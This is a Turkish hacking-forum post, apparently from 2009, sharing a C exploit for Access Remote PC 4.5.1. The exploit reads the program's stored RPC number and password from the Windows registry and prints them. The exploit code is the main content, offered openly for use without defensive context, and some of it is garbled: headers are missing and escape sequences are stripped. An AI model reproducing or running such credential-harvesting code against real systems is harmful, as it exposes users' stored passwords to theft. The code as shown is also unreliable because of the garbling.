FoRuM-TR_17
Would you like to react to this message? Create an account in a few clicks or log in to continue.

FoRuM-TR_17

DEV PAYLAŞIM SİTESİNE HOŞGELDİNİZ
 
AnasayfaLatest imagesKayıt OlGiriş yap

 

 Access Remote PC 4.5.1 Local Password Disclosure Exploit

Aşağa gitmek 
YazarMesaj
Admin
Admin

Admin
Admin


Mesaj Sayısı : 130
Ruh Hali : Access Remote PC 4.5.1 Local Password Disclosure Exploit Mutlu10gp4
Takımı : Access Remote PC 4.5.1 Local Password Disclosure Exploit Fenerbahce
SanaL Hayvan : Access Remote PC 4.5.1 Local Password Disclosure Exploit 5aslanwa7ff6iu0dy2
Rap Gücü :
Access Remote PC 4.5.1 Local Password Disclosure Exploit Left_bar_bleue100 / 100100 / 100Access Remote PC 4.5.1 Local Password Disclosure Exploit Right_bar_bleue

Kayıt tarihi : 18/02/09

Access Remote PC 4.5.1 Local Password Disclosure Exploit Empty
MesajKonu: Access Remote PC 4.5.1 Local Password Disclosure Exploit   Access Remote PC 4.5.1 Local Password Disclosure Exploit EmptyPerş. Şub. 19, 2009 1:49 pm

************************************************** ***************

Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

Application: Access Remote PC 4.5.1 (and probably prior versions)
Vendor: www.access-remote-pc.com

Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

************************************************** ***************/

#include
#include

#define BUF 100

int main()
{
HKEY hKey;
char RPCNumber[BUF], Password[BUF];
DWORD dwBuf = BUF;

if( RegOpenKeyEx( HKEY_CURRENT_USER,
"Software\Access Remote PC\Client\Options\Proxy",
0,
KEY_QUERY_VALUE,
&hKey
) !=ERROR_SUCCESS )
{
fprintf( stdout, "Access Remote PC is not installed on you PC!n" );
return -1;
}

if( RegQueryValueEx( hKey,
"RPCNumber",
NULL,
NULL,
(BYTE *)&RPCNumber,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( RPCNumber,"Not Found!n" );

if( RegQueryValueEx( hKey,
"Password",
NULL,
NULL,
(BYTE *)&Password,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( Password,"Not Found!n" );

fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozann" );
fprintf( stdout, "Credits to AtmaCAn" );
fprintf( stdout, "www.netmagister.com - www.spyinstructors.com n" );
fprintf( stdout, "kozan@netmagister.comnn" );
fprintf( stdout, "RPCNumbert: %sn", RPCNumber );
fprintf( stdout, "Passwordt: %sn", Password );

return 0;
}
Sayfa başına dön Aşağa gitmek
https://forum-tr-17.ace.st
 
Access Remote PC 4.5.1 Local Password Disclosure Exploit
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Password Depot 4.0.2

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
FoRuM-TR_17 :: +WeB HacK +Domain Hack :: +web hack-
Buraya geçin: